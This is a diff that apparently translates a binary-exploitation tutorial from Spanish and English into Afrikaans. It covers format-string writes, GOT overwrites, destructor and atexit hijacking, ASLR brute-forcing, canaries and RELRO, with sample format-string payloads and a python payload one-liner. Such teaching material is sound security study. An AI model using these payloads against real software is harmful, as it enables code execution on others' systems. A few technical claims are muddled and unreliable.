stapel nie, maar hou dit net die adresse van ROPs wat uitgevoer sal word deur middel van **ret**. Om hierdie payload te gebruik, moet die payload geroep word deur 'n **ret**-instruksie. -Este programa también sirve para crear los **payloads**. Le puedes dar la librería de la que quieres sacar los ROPs y él generará un payload en python al cual tu le das la dirección en la que está dicha librería y el payload ya está listo para ser usado como shellcode. Además, como usa llamadas al sistema no ejecuta realmente nada en el stack sino que solo va guardando direcciones de ROPs que se ejecutarán mediante **ret**. Para usar este payload hay que llamar al payload mediante una instrucción **ret**. - -**Integer overflows** - -Este tipo de overflows se producen cuando una variable no está preparada para soportar un número tan grande como se le pasa, posiblemente por una confusión entre variables con y sin signo, por ejemplo: +**Integer-oorloop** +Hierdie tipe oorloop vind plaas wanneer 'n veranderlike nie gereed is om 'n so groot getal te hanteer soos wat aan hom oorgedra word nie, moontlik as gevolg van verwarring tussen veranderlikes met en sonder teken, byvoorbeeld: ```c #include #include @@ -357,25 +380,23 @@ printf("\nIntento de hack\n"); return 0; } ``` +In die vorige voorbeeld sien ons dat die program 2 parameters verwag. Die eerste is die lengte van die volgende string en die tweede is die string self. -En el ejemplo anterior vemos que el programa se espera 2 parámetros. El primero la longitud de la siguiente cadena y el segundo la cadena. +As ons 'n negatiewe getal as die eerste parameter gee, sal dit sê dat len < 256 en sal ons daardie filter verbykom. Verder sal strlen(buffer) ook kleiner wees as l, omdat l 'n unsigned int is en baie groot sal wees. -Si le pasamos como primer parámetro un número negativo saldrá que len < 256 y pasaremos ese filtro, y además también strlen(buffer) será menor que l, pues l es unsigned int y será muy grande. +Hierdie tipe oorloop probeer nie om iets in die program se proses te skryf nie, maar om sleg ontwerpte filters te omseil om ander kwesbaarhede uit te buit. -Este tipo de overflows no busca lograr escribir algo en el proceso del programa, sino superar filtros mal diseñados para explotar otras vulnerabilidades. +**Ongeïnitialiseerde veranderlikes** -**Variables no inicializadas** +Die waarde van 'n ongeïnitialiseerde veranderlike is onbekend en dit kan interessant wees om dit te ondersoek. Dit kan wees dat dit die waarde aanneem van 'n veranderlike in die vorige funksie en dat dit deur die aanvaller beheer word. -No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante. +## **Formaat Strings** -## **Format Strings** +In C is **`printf`** 'n funksie wat gebruik kan word om 'n string af te druk. Die **eerste parameter** wat hierdie funksie verwag, is die **rou teks met die formatters**. Die **volgende parameters** wat verwag word, is die **waardes** wat die **formatters** in die rou teks moet **vervang**. -In C **`printf`** is function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text. - -The vulnerability appears when an **attacker text is put as the first argument** to this function. The attacker will be able to craft a **special input abusing** the **printf format** string capabilities to **write any data in any address**. Being able this way to **execute arbitrary code**. - -Fomatters: +Die kwesbaarheid ontstaan wanneer 'n **aanvaller se teks as die eerste argument** aan hierdie funksie voorsien word. Die aanvaller sal in staat wees om 'n **spesiale inset te skep deur misbruik te maak van die printf-formaatstring se vermoëns om enige data in enige adres te skryf**. Op hierdie manier kan arbitêre kode uitgevoer word. +Formatters: ```bash %08x —> 8 hex bytes %d —> Entire @@ -385,217 +406,200 @@ Fomatters: %hn —> Occupies 2 bytes instead of 4 $X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3 ``` - -**`%n`** **writes** the **number of written bytes** in the **indicated address. Writing** as much **bytes** as the hex number we **need** to write is how you can **write any data**. - +**`%n`** **skryf** die **aantal geskryfde bytes** in die **aangeduide adres. Deur** soveel **bytes** te skryf as die heksgetal wat ons **nodig het** om te skryf, kan jy **enige data skryf**. ```bash AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param AAAA.%500\$08x —> Param at offset 500 ``` +### GOT (Global Offsets Table) / PLT (Procedure Linkage Table) -### GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table) +Dit is die tabel wat die adres bevat van die eksterne funksies wat deur die program gebruik word. -This is the table that contains the **address** to the **external functions** used by the program. - -Get the address to this table with: **`objdump -s -j .got ./exec`** +Kry die adres van hierdie tabel met: **`objdump -s -j .got ./exec`** ![](<../../.gitbook/assets/image (619).png>) -Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT` +Let daarop hoe nadat die uitvoerbare lêer in GEF gelaai is, kan jy die funksies sien wat in die GOT is: `gef➤ x/20x 0xDIR_GOT` -![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png>) +![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png>) -Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: +Met GEF kan jy 'n foutopsporingsessie begin en die `got` uitvoer om die got-tabel te sien: ![](<../../.gitbook/assets/image (621).png>) -In a binary the GOT has the **addresses to the functions or** to the **PLT** section that will load the function address. The goal of this exploit is to **override the GOT entry** of a function that is going to be executed later **with** the **address** of the PLT of the **`system`** **function**. Ideally, you will **override** the **GOT** of a **function** that is **going to be called with parameters controlled by you** (so you will be able to control the parameters sent to the system function). +In 'n binêre lêer het die GOT die adresse na die funksies of na die PLT-seksie wat die funksie-adres sal laai. Die doel van hierdie aanval is om die GOT-inskrywing van 'n funksie wat later uitgevoer gaan word, te oorskryf met die adres van die PLT van die `system`-funksie. Ideaal gesproke sal jy die GOT van 'n funksie oorskryf wat geroep gaan word met parameters wat deur jou beheer word (sodat jy die parameters wat na die stelsel-funksie gestuur word, kan beheer). -If **`system`** **isn't used** by the script, the system function **won't** have an entry in the GOT. In this scenario, you will **need to leak first the address** of the `system` function. +As die skripsie nie `system` gebruik nie, sal die stelsel-funksie nie 'n inskrywing in die GOT hê nie. In hierdie scenario sal jy die adres van die `system`-funksie eerste moet uitlek. -**Procedure Linkage Table** is a **read only** table in ELF file that stores all necessary **symbols that need a resolution**. When one of these functions are called the **GOT** will **redirect** the **flow** to the **PLT** so it can **resolve** the **address** of the function and write it on the GOT.\ -Then, the **next time** a call is performed to that address the **function** is **called directly** without needing to resolve it. +Die Procedure Linkage Table is 'n alleenleestabel in die ELF-lêer wat al die nodige simbole stoor wat 'n oplossing benodig. Wanneer een van hierdie funksies geroep word, sal die GOT die vloei na die PLT omskakel sodat dit die adres van die funksie kan oplos en dit in die GOT kan skryf.\ +Daarna, die volgende keer as 'n oproep na daardie adres uitgevoer word, word die funksie direk geroep sonder om dit op te los. -You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`** +Jy kan die PLT-adresse sien met **`objdump -j .plt -d ./vuln_binary`** -### **Exploit Flow** +### Exploit Vloei -As explained before the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Ideally we could set the **address to a shellcode** located in a executable section, but highly probable you won't be able to write a shellcode in a executable section.\ -So a different option is to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**. +Soos voorheen verduidelik, is die doel om die adres van 'n funksie in die GOT-tabel te oorskryf wat later geroep gaan word. Ideaal gesproke kan ons die adres na 'n skulpkode stel wat in 'n uitvoerbare seksie geleë is, maar dit is baie waarskynlik dat jy nie 'n skulpkode in 'n uitvoerbare seksie kan skryf nie.\ +Dus 'n ander opsie is om 'n funksie wat sy argumente van die gebruiker ontvang, te oorskryf en dit na die `system`-funksie te verwys. -To write the address, usually 2 steps are done: You **first writes 2Bytes** of the address and then the other 2. To do so **`$hn`** is used. +Om die adres te skryf, word gewoonlik 2 stappe gedoen: Jy skryf **eerstens 2 byte** van die adres en dan die ander 2. Om dit te doen, word **`$hn`** gebruik. -**HOB** is called to the 2 higher bytes of the address\ -**LOB** is called to the 2 lower bytes of the address +**HOB** verwys na die 2 hoër byte van die adres\ +**LOB** verwys na die 2 laer byte van die adres -So, because of how format string works you need to **write first the smallest** of \[HOB, LOB] and then the other one. +Dus, as gevolg van hoe formaatstring werk, moet jy **eerstens die kleinste** van \[HOB, LOB] skryf en dan die ander een. -If HOB < LOB\ +As HOB < LOB\ `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]` -If HOB > LOB\ +As HOB > LOB\ `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB \`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` -### **Format String Exploit Template** +### Formaatstring Aanval Sjabloon -You an find a **template** to exploit the GOT using format-strings here: +Jy kan 'n sjabloon vind om die GOT te misbruik deur formaatstrings hier: {% content-ref url="format-strings-template.md" %} [format-strings-template.md](format-strings-template.md) {% endcontent-ref %} -### **.fini\_array** - -Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**. +### .fini\_array +Dit is in wese 'n struktuur met funksies wat voor die program klaar uitgevoer word. Dit is interessant as jy jou skulpkode kan roep deur na 'n adres te spring, of in gevalle waar jy weer terug na die hoofprogram moet gaan om die formaatstring 'n tweede keer te misbruik. ```bash objdump -s -j .fini_array ./greeting ./greeting: file format elf32-i386 Contents of section .fini_array: - 8049934 a0850408 +8049934 a0850408 #Put your address in 0x8049934 ``` +Let wel dat dit **nie** 'n **ewige lus** sal skep nie, omdat wanneer jy terugkeer na die hooffunksie, sal die kanarie dit opmerk, die einde van die stapel mag dalk beskadig wees en die funksie sal nie weer geroep word nie. So met hierdie metode sal jy in staat wees om **1 ekstra uitvoering** van die kwesbaarheid te hê. -Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln. +### **Formaat Strings om Inhoud te Dump** -### **Format Strings to Dump Content** +'n Formaat string kan ook misbruik word om inhoud uit die geheue van die program te **dump**.\ +Byvoorbeeld, in die volgende situasie is daar 'n **plaaslike veranderlike in die stapel wat na 'n vlag wys**. As jy **vind** waar in die **geheue** die **wyser** na die **vlag** is, kan jy **printf toegang** tot daardie **adres** maak en die **vlag** druk: -A format string can also be abused to **dump content** from the memory of the program.\ -For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**: - -So, flag is in **0xffffcf4c** +So, vlag is in **0xffffcf4c** ![](<../../.gitbook/assets/image (618) (2).png>) -And from the leak you can see the **pointer to the flag** is in the **8th** parameter: +En vanuit die lek kan jy sien dat die **wyser na die vlag** in die **8ste** parameter is: ![](<../../.gitbook/assets/image (623).png>) -So, **accessing** the **8th parameter** you can get the flag: +So, deur die **8ste parameter** te **benader**, kan jy die vlag kry: ![](<../../.gitbook/assets/image (624).png>) -Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**! +Let daarop dat na die **vorige aanval** en besef dat jy inhoud kan **lek**, kan jy wyers stel na **`printf`** na die afdeling waar die **uitvoerbare lêer** gelaai word en dit **volledig dump**! ### **DTOR** {% hint style="danger" %} -Nowadays is very **weird to find a binary with a dtor section**. +Teenwoordig is dit baie **vreemd om 'n binêre lêer met 'n dtor-afdeling te vind**. {% endhint %} -The destructor are functions that are **executed before program finishes**.\ -If you manage to **write** an **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends.\ -Get the address of this section with: - +Die destructor is funksies wat **uitgevoer word voordat die program eindig**.\ +As jy daarin slaag om 'n **adres** na 'n **shellcode** in **`__DTOR_END__`** te skryf, sal dit **uitgevoer word** voordat die programme eindig.\ +Kry die adres van hierdie afdeling met: ```bash objdump -s -j .dtors /exec rabin -s /exec | grep “__DTOR” ``` +Gewoonlik sal jy die **DTOR**-afdeling **tussen** die waardes `ffffffff` en `00000000` vind. So as jy net daardie waardes sien, beteken dit dat daar **geen funksie geregistreer is nie**. Skryf dus die **`00000000`** oor met die **adres** na die **shellcode** om dit uit te voer. -Usually you will find the **DTOR** section **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it. +### **Formaatstrings vir buffer-oorloop** -### **Format Strings to Buffer Overflows** +Die **sprintf-funksie skuif** 'n geformateerde string **na** 'n **veranderlike**. Daarom kan jy die **formattering** van 'n string misbruik om 'n **buffer-oorloop in die veranderlike** waar die inhoud gekopieer word, te veroorsaak.\ +Byvoorbeeld, die payload `%.44xAAAA` sal **44B+"AAAA" in die veranderlike skryf**, wat 'n buffer-oorloop kan veroorsaak. -Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\ -For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. - -### **\_\_atexit Structures** +### **\_\_atexit-Strukture** {% hint style="danger" %} -Nowadays is very **weird to exploit this**. +Teenwoordig is dit baie **vreemd om dit uit te buit**. {% endhint %} -**`atexit()`** is a function to which **other functions are passed as parameters.** These **functions** will be **executed** when executing an **`exit()`** or the **return** of the **main**.\ -If you can **modify** the **address** of any of these **functions** to point to a shellcode for example, you will **gain control** of the **process**, but this is currently more complicated.\ -Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64\_86**.\ -The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector. +**`atexit()`** is 'n funksie waarvolgens **ander funksies as parameters oorgedra word**. Hierdie **funksies** sal **uitgevoer word** wanneer 'n **`exit()`** uitgevoer word of die **terugkeer** van die **hooffunksie**.\ +As jy die **adres** van enige van hierdie **funksies** kan **verander** om na 'n shellcode te verwys, sal jy beheer oor die proses verkry, maar dit is tans meer ingewikkeld.\ +Tans is die **adresse van die funksies** wat uitgevoer moet word, **verskuil** agter verskeie strukture en uiteindelik is die adres waarna dit verwys nie die adresse van die funksies nie, maar is **geënkripteer met XOR** en verskuiwings met 'n **willekeurige sleutel**. Dus is hierdie aanvalsvektor tans **nie baie nuttig ten minste op x86** en **x64\_86** nie.\ +Die **enkripsiefunksie** is **`PTR_MANGLE`**. **Ander argitekture** soos m68k, mips32, mips64, aarch64, arm, hppa... **implementeer nie die enkripsie**-funksie nie omdat dit **dieselfde teruggee** as wat as inset ontvang is. Dus kan hierdie argitekture deur hierdie vektor aangeval word. ### **setjmp() & longjmp()** {% hint style="danger" %} -Nowadays is very **weird to exploit this**. +Teenwoordig is dit baie **vreemd om dit uit te buit**. {% endhint %} -**`Setjmp()`** allows to **save** the **context** (the registers)\ -**`longjmp()`** allows to **restore** the **context**.\ -The **saved registers** are: `EBX, ESI, EDI, ESP, EIP, EBP`\ -What happens is that EIP and ESP are passed by the **`PTR_MANGLE`** function, so the **architecture vulnerable to this attack are the same as above**.\ -They are useful for error recovery or interrupts.\ -However, from what I have read, the other registers are not protected, **so if there is a `call ebx`, `call esi` or `call edi`** inside the function being called, control can be taken over. Or you could also modify EBP to modify the ESP. +**`Setjmp()`** maak dit moontlik om die **konteks** (die registers) **te stoor**.\ +**`longjmp()`** maak dit moontlik om die **konteks te herstel**.\ +Die **gestoorde registers** is: `EBX, ESI, EDI, ESP, EIP, EBP`\ +Wat gebeur is dat EIP en ESP deur die **`PTR_MANGLE`**-funksie oorgedra word, sodat die **argitektuur wat vatbaar is vir hierdie aanval dieselfde is as hierbo**.\ +Hulle is nuttig vir foutherstel of onderbrekings.\ +Tog, volgens wat ek gelees het, word die ander registers nie beskerm nie, **dus as daar 'n `call ebx`, `call esi` of `call edi`** binne die funksie wat geroep word, kan beheer oorgeneem word. Of jy kan ook EBP wysig om ESP te wysig. -**VTable y VPTR en C++** +**VTable en VPTR in C++** -Each class has a **Vtable** which is an array of **pointers to methods**. +Elke klas het 'n **Vtabel** wat 'n reeks **verwysings na metodes** is. -Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode. +Elke voorwerp van 'n **klas** het 'n **VPtr** wat 'n **verwysing** na die reeks van sy klas is. Die VPtr is deel van die kop van elke voorwerp, so as 'n **oorwritting** van die **VPtr** bereik word, kan dit **verander** word om na 'n dummie-metode te **verwys**, sodat die uitvoering van 'n funksie na die shellcode sal gaan. -## **Medidas preventivas y evasiones** +## **Voorkomende maatreëls en ontduiking** -**ASLR no tan aleatorio** +**ASLR nie so willekeurig nie** -PaX dive el espacio de direcciones del proceso en 3 grupos: +PaX verdeel die adresruimte van die proses in 3 groepe: -Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta\_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales +Geïnisieerde en nie-geïnisieerde kodes en data: .text, .data en .bss —> 16-bits entropie in die delta\_exec-veranderlike, hierdie veranderlike word willekeurig geïnisieer met elke proses en word by die aanvanklike adresse gevoeg -Memoria asignada por mmap() y libraries compartidas —> 16bits, delta\_mmap +Geheue toegewys deur mmap() en gedeelde biblioteke —> 16-bits, delta\_mmap -El stack —> 24bits, delta\_stack —> Realmente 11 (del byte 10º al 20º inclusive) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack +Die stapel —> 24-bits, delta\_stack —> Werklik 11 (vanaf die 10de tot die 20ste byte ingesluit) —> uitgelyn op 16 byte —> 524,288 moontlike werklike stapeladresse -Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack. +Die omgewingsveranderlikes en argumente skuif minder as 'n buffer op die stapel. **Return-into-printf** -Es una técnica para convertir un buffer overflow en un error de cadena de formato. Consiste en sustituir el EIP para que apunte a un printf de la función y pasarle como argumento una cadena de formato manipulada para obtener valores sobre el estado del proceso. +Dit is 'n tegniek om 'n buffer-oorloop in 'n formaatfout om te skakel. Dit behels die vervanging van die EIP sodat dit na 'n printf van die funksie verwys en 'n gemanipuleerde formaatstring as argument oorgedra word om waardes oor die toestand van die proses te verkry. -**Ataque a librerías** +**Aanval op biblioteke** -Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork() el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep() de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta\_mmap y calcular las demás. +Biblioteke is op 'n posisie met 16-bits willekeurigheid = 65,636 moontlike adresse. As 'n kwesbare bediener fork() aanroep, word die geheue-adresruimte in die kinderproses gekloneer en bly onveranderd. Daarom kan 'n brute force-aanval op die usleep()-funksie van libc probeer word deur "16" as argument oor te dra, sodat as dit langer as normaal neem om te reageer, die funksie gevind is. Deur te weet waar hierdie funksie is, kan delta\_mmap verkry word en die ander bereken word. -La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta. +Die enigste manier om seker te wees dat ASLR werk, is om 64-bits argitektuur te gebruik. Daar is geen brute force-aanvalle nie. -**StackGuard y StackShield** +**StackGuard en StackShield** -**StackGuard** inserta antes del EIP —> 0x000aff0d(null, \n, EndOfFile(EOF), \r) —> Siguen siendo vulnerables recv(), memcpy(), read(), bcoy() y no protege el EBP +**StackGuard** voeg voor die EIP in —> 0x000aff0d(null, \n, EndOfFile(EOF), \r) —> Ontvang steeds aanvalle recv(), memcpy(), read(), bcoy() en beskerm nie die EBP nie -**StackShield** es más elaborado que StackGuard +**StackShield** is meer ingewikkeld as StackGuard -Guarda en una tabla (Global Return Stack) todas las direcciones EIP de vuelta de forma que el overflow no cause ningún daño. Ademas, se pueden comparar ambas direcciones para a ver si ha habido un desbordamiento. +Dit stoor al die terugkeer-EIP-adresse in 'n tabel (Global Return Stack) sodat die oorloop geen skade veroorsaak nie. Daarbenewens kan beide adresse vergelyk word om te sien of daar 'n oorloop was. -También se puede comprobar la dirección de retorno con un valor límite, así si el EIP se va a un sitio distinto del habitual como el espacio de datos se sabrá. Pero esto se sortea con Ret-to-lib, ROPs o ret2ret. +Die terugkeeradres kan ook met 'n limietwaarde vergelyk word, sodat as die EIP na 'n ander plek as die normale soos die data-ruimte gaan, dit bekend sal wees. Maar dit kan omseil word met Ret-to-lib, ROP's of ret2ret. -Como se puede ver stackshield tampoco protege las variables locales. +Soos gesien kan word, beskerm stackshield ook nie die plaaslike veranderlikes nie. **Stack Smash Protector (ProPolice) -fstack-protector** -Se pone el canary antes del EBP. Reordena las variables locales para que los buffers estén en las posiciones más altas y así no puedan sobreescribir otras variables. +Die kanarie word voor die EBP geplaas. Dit herorden die plaaslike veranderlikes sodat die buffers in die hoogste posisies is en dus nie ander veranderlikes oorskryf kan word nie. -Además, realiza una copia segura de los argumentos pasados encima de la pila (encima de las vars locales) y usa estas copias como argumentos. +Dit maak ook 'n veilige kopie van die argumente wat bo-op die stapel (bo-op die plaaslike veranderlikes) oorgedra word en gebruik hierdie kopieë as argumente. -No puede proteger arrays de menos de 8 elementos ni buffers que formen parte de una estructura del usuario. - -El canary es un número random sacado de “/dev/urandom” o sino es 0xff0a0000. Se almacena en TLS(Thread Local Storage). Los hilos comparten el mismo espacio de memoria, el TLS es un área que tiene variables globales o estáticas de cada hilo. Sin embargo, en ppio estas son copiadas del proceso padre aunque el proceso hijo podría modificar estos datos sin modificar los del padre ni los de los demás hijos. El problema es que si se usa fork() pero no se crea un nuevo canario, entonces todos los procesos (padre e hijos) usan el mismo canario. En i386 se almacena en gs:0x14 y en x86\_64 se almacena en fs:0x28 - -Esta protección localiza funciones que tengan buffer que puedan ser atacados e incluye en ellas código al ppio de la función para colocar el canario y código al final para comprobarlo. - -La función fork() realiza una copia exacta del proceso del padre, por eso mismo si un servidor web llama a fork() se puede hacer un ataque de fuerza bruta byte por byte hasta averiguar el canary que se está utilizando. - -Si se usa la función execve() después de fork(), se sobreescribe el espacio y el ataque ya no es posible. vfork() permite ejecutar el proceso hijo sin crear un duplicado hasta que el proceso hijo intentase escribir, entonces sí creaba el duplicado. - -**Relocation Read-Only (RELRO)** +Dit kan nie rye van minder as 8 elemente of buffers wat deel is van 'n gebruikersstruktuur beskerm nie. +Die kanarie is 'n willekeurige getal wat uit "dev/urandom" gehaal word, of andersins is dit 0xff0a0000. Dit word in TLS (Thread Local Storage) gestoor. Drade deel dieselfde geheue-adresruimte, TLS is 'n area wat globale of statiese veranderlikes van elke draad bevat. In beginsel word hierdie van die ouerproses gekopieer, maar die kinderproses kan ### Relro -**Relro (Read only Relocation)** affects the memory permissions similar to NX. The difference is whereas with NX it makes the stack executable, RELRO makes **certain things read only** so we **can't write** to them. The most common way I've seen this be an obstacle is preventing us from doing a **`got` table overwrite**, which will be covered later. The `got` table holds addresses for libc functions so that the binary knows what the addresses are and can call them. Let's see what the memory permissions look like for a `got` table entry for a binary with and without relro. - -With relro: +**Relro (Read only Relocation)** beïnvloed die geheue toestemmings soortgelyk aan NX. Die verskil is dat terwyl NX die stapel uitvoerbaar maak, maak RELRO **sekere dinge slegs leesbaar** sodat ons nie daaraan kan skryf nie. Die mees algemene manier waarop ek gesien het dat dit 'n struikelblok is, is dat dit ons verhoed om 'n **`got`-tabel oorskrywing** te doen, wat later gedek sal word. Die `got`-tabel bevat adresse vir libc-funksies sodat die binêre weet wat die adresse is en hulle kan aanroep. Kom ons kyk na hoe die geheue toestemmings lyk vir 'n `got`-tabelinskrywing vir 'n binêre met en sonder relro. +Met relro: ```bash gef➤ vmmap Start End Offset Perm Path @@ -626,11 +630,9 @@ $2 = {char *(char *, int, FILE *)} 0x7ffff7e4d100 <_IO_fgets> gef➤ search-pattern 0x7ffff7e4d100 [+] Searching '\x00\xd1\xe4\xf7\xff\x7f' in memory [+] In '/tmp/tryc'(0x555555557000-0x555555558000), permission=r-- - 0x555555557fd0 - 0x555555557fe8 → "\x00\xd1\xe4\xf7\xff\x7f[...]" +0x555555557fd0 - 0x555555557fe8 → "\x00\xd1\xe4\xf7\xff\x7f[...]" ``` - -Without relro: - +Sonder relro: ```bash gef➤ vmmap Start End Offset Perm Path @@ -661,215 +663,201 @@ $2 = {char *(char *, int, FILE *)} 0x7ffff7e4d100 <_IO_fgets> gef➤ search-pattern 0x7ffff7e4d100 [+] Searching '\x00\xd1\xe4\xf7\xff\x7f' in memory [+] In '/tmp/try'(0x404000-0x405000), permission=rw- - 0x404018 - 0x404030 → "\x00\xd1\xe4\xf7\xff\x7f[...]" +0x404018 - 0x404030 → "\x00\xd1\xe4\xf7\xff\x7f[...]" ``` +Vir die binêre **sonder relro**, kan ons sien dat die `got` inskrywing adres vir `fgets` `0x404018` is. As ons na die geheue afbeeldings kyk, sien ons dat dit tussen `0x404000` en `0x405000` val, wat die **toestemmings `rw`** het, wat beteken dat ons daaraan kan lees en skryf. Vir die binêre **met relro**, sien ons dat die `got` tabel adres vir die uitvoering van die binêre (pie is geaktiveer, so hierdie adres sal verander) `0x555555557fd0` is. In daardie binêre se geheue afbeelding val dit tussen `0x0000555555557000` en `0x0000555555558000`, wat die geheue **toestemming `r`** het, wat beteken dat ons slegs daarvan kan lees. -For the binary **without relro**, we can see that the `got` entry address for `fgets` is `0x404018`. Looking at the memory mappings we see that it falls between `0x404000` and `0x405000`, which has the **permissions `rw`**, meaning we can read and write to it. For the binary **with relro**, we see that the `got` table address for the run of the binary (pie is enabled so this address will change) is `0x555555557fd0`. In that binary's memory mapping it falls between `0x0000555555557000` and `0x0000555555558000`, which has the memory **permission `r`**, meaning that we can only read from it. +Wat is die **omseiling**? Die tipiese omseiling wat ek gebruik, is om eenvoudig nie na geheue-areas te skryf wat relro veroorsaak om slegs leesbaar te wees nie, en **'n ander manier vind om kodering uit te voer**. -So what's the **bypass**? The typical bypass I use is to just don't write to memory regions that relro causes to be read only, and **find a different way to get code execution**. +Let daarop dat die binêre voor die uitvoering die adresse van die funksies moet weet: -Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions: - -* Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution. -* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. `` `** ``-z relro`**`y`**`-z now\`\*\* - -To check if a program uses Bind now you can do: +* Luie binding: Die adres van 'n funksie word die eerste keer gesoek as die funksie geroep word. Dus moet die GOT skryftoestemmings tydens uitvoering hê. +* Bind nou: Die adresse van die funksies word aan die begin van die uitvoering opgelos, waarna slegs leestoestemmings aan sensitiewe afdelings soos .got, .dtors, .ctors, .dynamic, .jcr gegee word. `` `** ``-z relro`**`y`**`-z now\`\*\* +Om te kontroleer of 'n program Bind nou gebruik, kan jy die volgende doen: ```bash readelf -l /proc/ID_PROC/exe | grep BIND_NOW ``` +Wanneer die binêre lêer in die geheue gelaai word en 'n funksie vir die eerste keer geroep word, word daar na die PLT (Procedure Linkage Table) gespring. Van daar af word 'n sprong (jmp) na die GOT gemaak en word besef dat daardie inskrywing nie opgelos is nie (dit bevat 'n volgende adres van die PLT). Dit roep dan die Runtime Linker of rtfd aan om die adres op te los en in die GOT te stoor. -Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT (Procedure Linkage Table), de aquí se realiza un salto (jmp) a la GOT y descubre que esa entrada no ha sido resuelta (contiene una dirección siguiente de la PLT). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT. +Wanneer 'n funksie geroep word, word die PLT geroep, wat die adres van die GOT bevat waar die funksie se adres gestoor word. Dit stuur die vloei daarheen en roep so die funksie aan. As dit egter die eerste keer is dat die funksie geroep word, is die GOT se inhoud die volgende instruksie van die PLT, dus volg die vloei die PLT-kode (rtfd) en vind die adres van die funksie, stoor dit in die GOT en roep dit aan. -Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT (rtfd) y averigua la dirección de la función, la guarda en la GOT y la llama. +By die laai van 'n binêre lêer in die geheue, het die samesteller gesê waar data geplaas moet word wanneer die program uitgevoer word. -Al cargar un binario en memoria el compilador le ha dicho en qué offset tiene que situar datos que se deben de cargar cuando se corre el programa. +Lui binding -> Die adres van die funksie word die eerste keer gesoek wanneer die funksie geroep word, sodat die GOT skryfregte het sodat dit daar gestoor kan word en nie weer gesoek hoef te word nie. -Lazy binding —> La dirección de la función se busca la primera vez que se invoca dicha función, por lo que la GOT tiene permisos de escritura para que cuando se busque, se guarde ahí y no haya que volver a buscarla. +Bind nou -> Die adresse van die funksies word gesoek by die laai van die program en die regte van die .got, .dtors, .ctors, .dynamic, .jcr afdelings word verander na slegs lees. **-z relro** en **-z now** -Bind now —> Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. **-z relro** y **-z 